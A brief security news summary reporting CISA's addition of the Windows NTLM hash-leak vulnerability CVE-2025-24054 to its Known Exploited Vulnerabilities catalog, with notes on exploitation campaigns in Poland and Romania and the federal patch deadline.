The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a medium-severity Windows vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, identified as CVE-2025-24054, allows attackers to steal NTLM hashes — a legacy Windows authentication method — through malicious files, enabling lateral movement attacks across networks.
The vulnerability, patched by Microsoft in March 2025, has been actively exploited in campaigns targeting government and private institutions in Poland and Romania. In these cases, attackers distributed Dropbox links containing ZIP archives with exploit files that leaked NTLMv2-SSP hashes with minimal user interaction — just downloading and extracting the content was enough. Similar attacks previously hit Ukraine and Colombia in 2024, linked to groups such as UAC-0194 and Blind Eagle.
Microsoft noted that the risk arises even with minimal user action, such as previewing a crafted .library-ms file. While the company initially considered exploitation "unlikely," the flaw has since been used in at least 10 recent campaigns. The issue is a variant of CVE-2024-43451, also related to NTLM hash leaks, further underscoring the need for immediate patching.
CISA required U.S. federal agencies to apply the patches by May 8, 2025. Experts warn that NTLM hashes can be used in "pass-the-hash" attacks for privilege escalation, making proactive vulnerability management critical in corporate environments.
This post was translated and summarized from its original version using ChatGPT version 4o, with human review.
Source: The Hacker News